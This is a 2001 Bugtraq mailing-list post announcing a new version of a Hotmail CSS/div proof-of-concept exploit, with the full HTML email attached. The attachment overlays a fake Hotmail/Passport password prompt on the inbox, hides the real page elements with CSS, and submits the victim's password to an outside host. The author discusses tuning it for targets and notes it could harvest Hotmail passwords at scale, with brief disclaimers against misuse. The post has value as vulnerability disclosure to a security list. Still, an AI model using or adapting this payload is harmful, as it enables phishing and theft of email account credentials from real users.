hotmail css/div exploit: new version
Date: Tue, 30 Jan 2001 15:16:29 -0000
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: hotmail css/div exploit: new version
This is a multi-part message in MIME format.
------=_NextPart_000_2c04_7347_2d0c
Content-Type: text/plain; format=flowed
hello,
the last exploit was broken with msie 5.50, in fact the background
image didn't appear at all, anyway it was a bad idea to use it.
So i decided to learn a bit more about css and this is a new version
that will work with msie 4/5/5.50, the background color is now fixed as a
blank value (#ffffff) into the div class (thus deleting one useless
connection)
The mail folders navigator input form that buggily appeared on the top layer
was fix too by playing with its porperties (select{ visibility:hidden}).
The scrollbar at the bottom was reduced with the help of the class width
parameter. U will have to choose it accordingly to the screen res of the
trojan receiver, if u don't know ( u should ;) ), just take a big value.
But this exploit isn't absolutely perfect, we have still this advertising
iframe at the top middle and since we can't use javascript to modify its
properties, i have no more idea at least for now.
This iframe tag is really interesting but already filtered by hotmail and
yahoo, may be in some cross-vulnerable sites list that was diffused here
some weeks ago.
Anyway it would be much more than necessary to recover most of hotmail 74
millions mailboxes passwords. it would.
herewith u will find the exploit, just copy it (ctrl-c/v) in a mail to YOUR
OWN hotmail account.
NOTE: To work properly, the message MUST BEGIN with the html tag (nothing
above).
NOTE2: don't send it to me ;)
and again,
Don't use it for any malicious activity.
Have a nice day
===============
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
------=_NextPart_000_2c04_7347_2d0c
Content-Type: text/html; name="horsemail.html"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="horsemail.html"
<html>
<div align="left">
<style type="text/css">
<!--
div.trojan {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 850px;
height: 950px;
top: 0px;
left: 0px;
visibility: visible;
z-index: 0;
font-family: times;
font-size: 72px;
}
-->
</style>
<div id="layer1" class="trojan">
<div id="layer2" class="trojan" style="left:80px;top:100px;
">
<form name="passwordform" target="_blank" action="http://c3rber.multimania.com/merci.txt" method="GET" target="_blank" AUTOCOMPLETE="OFF" >
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td colspan=2>
<table cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td>
<a href="#" ><img src="http://c3rber.multimania.com/horsemail.gif" width=468 height=60 border=0 alt=""></a>
</td>
<td align="CENTER" nowrap>
<img src="http://c3rber.multimania.com/pass.gif" width=140 height=44 border=0 alt="Find Out More About Passport"><br>
<a href="#" ><font class="f" size=2>Help</font></a><br>
</td></tr></table>
</td>
</tr><tr>
<td bgcolor="#cccc99"><font class="f" size=4><b>Please re-enter your password at your own risk</b></font></td>
<td valign="top"><table width="100%" border=0 cellspacing=0 cellpadding=0><tr><td height=1 bgcolor="#cccc99"></td></tr></table></td>
</tr>
<tr><td height="6"></td></tr>
<tr valign="top">
<td><font class="s">
</font>
</td>
<td rowspan=4><font class="s">
</font>
</font>
</td>
</tr>
<tr>
<td>
<font class="f" size=2><b><victim@hotmail.com></b></font>
<table cellpadding=0 cellspacing=0>
<tr>
<td height=35 valign="middle"><font class="sbd">Password</font> </td>
<td><input type="password" name="passwd" size="16" maxlength="16"></td>
<td width=22 valign="middle" align="center"> </td>
<td><input type="submit" name="enter" value="Sign in"></td>
</tr>
<tr>
<td></td>
<td colspan="2"><font class="f" size=2><b><a href="#" >Change
User</a></b></font></td>
</tr>
</table>
</form>
</table>
<table cellpadding=0 cellspacing=0 border=0 width=590>
<tr>
<td>
<font class="s">Hotmail © Cross-scripting/css 2001 Proof of concept. C3rb3r (January 2001).</font>
<a href="javascript:Filtered()" target="_blank">H0rsemail TERMS OF USE and NOTICES</font></a>
<a href="javascript:Filtered()" target="_blank"><font class="s">untrusted Privacy Statement</font></a>
</td>
</tr>
</table>
</div>
<p align="center">
</div>
</div>
<style type="css/text">
<!--
input { visibility: hidden }
select { visibility: hidden; color: #ffffff }
option { visibility: hidden; color: #ffffff }
iframe { visibility: hidden; color: #ffffff }
div {
background-color: #ffffff;
background-repeat: repeat;
position: absolute;
width: 0px;
height: 0px;
top: 0px;
left: 0px;
visibility: hidden;
z-index: 1;
font-family: times;
font-size: 72px;
}
-->
</style>
<!--
Gregory Duchemin - Security Consultant -
NEUROCOM CANADA
1001 bd Maisonneuve Ouest - suite 200
H3A 3C8 Montreal - Quebec - CANADA
c3rb3r@hotmail.com
Just a proof of concept, don't use it for illegal purposes
Original idea : Ben Li <bali@THOCK.COM>
-->
<div id="trash">
<!--
------=_NextPart_000_2c04_7347_2d0c--
